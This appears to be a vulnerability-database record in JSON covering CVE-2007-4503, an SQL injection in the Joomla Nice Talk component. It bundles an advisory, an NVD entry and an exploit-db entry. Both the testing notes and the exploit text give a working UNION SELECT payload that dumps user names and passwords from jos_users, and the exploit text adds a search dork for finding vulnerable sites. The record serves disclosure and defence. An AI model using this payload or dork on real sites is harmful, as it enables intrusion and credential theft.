{"bulletinFamily": "software", "viewCount": 2, "reporter": "ajann()", "references": [], "description": "## Vulnerability Description\nAzrulStudio Nice Talk contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the Nice Talk component not properly sanitizing user-supplied input to the 'tagid' parameter. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): edit the source code to properly sanitize input.\n## Short Description\nAzrulStudio Nice Talk contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the Nice Talk component not properly sanitizing user-supplied input to the 'tagid' parameter. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/[path]//index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*\n## References:\n[Secunia Advisory ID:26576](https://secuniaresearch.flexerasoftware.com/advisories/26576/)\nOther Advisory URL: http://www.milw0rm.com/exploits/4308\nISS X-Force ID: 36224\n[CVE-2007-4503](https://vulners.com/cve/CVE-2007-4503)\n", "affectedSoftware": [{"operator": "eq", "version": "0.9.3", "name": "Nice Talk"}], "hashmap": [{"key": "affectedSoftware", "hash": "f7a9599724ec2db92aee8cb7c4f5c688"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "e742241a60b80d8b23259f0779d9465a"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "02e431c15484379f96f7cd977ca1e334"}, {"key": "href", "hash": "bb85d49027a35b97875c5a764b1d7cd0"}, {"key": "modified", "hash": "90e1594f9ce7abb6d323fd242b3ac0eb"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "90e1594f9ce7abb6d323fd242b3ac0eb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7f3388d45713a14bd2d972f5e17b1e6b"}, {"key": "title", "hash": "67bdc18886547f4a0bc0045523a33685"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:36587", "modified": "2007-08-23T00:00:00", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4503"]}, {"type": "exploitdb", "idList": ["EDB-ID:4308"]}], "modified": "2017-04-28T13:20:32"}, "vulnersScore": 7.5}, "id": "OSVDB:36587", "title": "AzrulStudio Nice Talk Component for Joomla! tagid Variable SQL Injection", "hash": "b00689fd930e2867842019eb68c88363623fc5e955be4da064534a3ba4998dc6", "edition": 1, "published": "2007-08-23T00:00:00", "type": "osvdb", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-4503"], "lastseen": "2017-04-28T13:20:32"}

{"cve": [{"lastseen": "2017-09-29T14:25:29", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in index.php in the Nice Talk component (com_nicetalk) 0.9.3 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the tagid parameter.", "modified": "2017-09-28T21:29:17", "published": "2007-08-23T15:17:00", "id": "CVE-2007-4503", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4503", "title": "CVE-2007-4503", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:36:54", "bulletinFamily": "exploit", "description": "Joomla Component Nice Talk <= 0.9.3 (tagid) SQL Injection Vulnerability. CVE-2007-4503. Webapps exploit for php platform", "modified": "2007-08-23T00:00:00", "published": "2007-08-23T00:00:00", "id": "EDB-ID:4308", "href": "https://www.exploit-db.com/exploits/4308/", "type": "exploitdb", "title": "Joomla Component Nice Talk <= 0.9.3 tagid SQL Injection Vulnerability", "sourceData": "*******************************************************************************\n# Title : Joomla Component Nice Talk <= 0.9.3 (tagid) Remote Blind SQL Injection Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://www.azrul.com\n# $$ : ??\n# Dork : inurl:index.php?option=com_nicetalk\n# DorkEx : http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_nicetalk&hl=tr&start=0&sa=N\n\n*******************************************************************************\n\n[[SQL]]]---------------------------------------------------------\n\nhttp://[target]/[path]//index.php?option=com_nicetalk&tagid=[SQL Inject]\n\nExample:\n\n//index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*\n\n[[/SQL]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-08-23]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4308/"}]}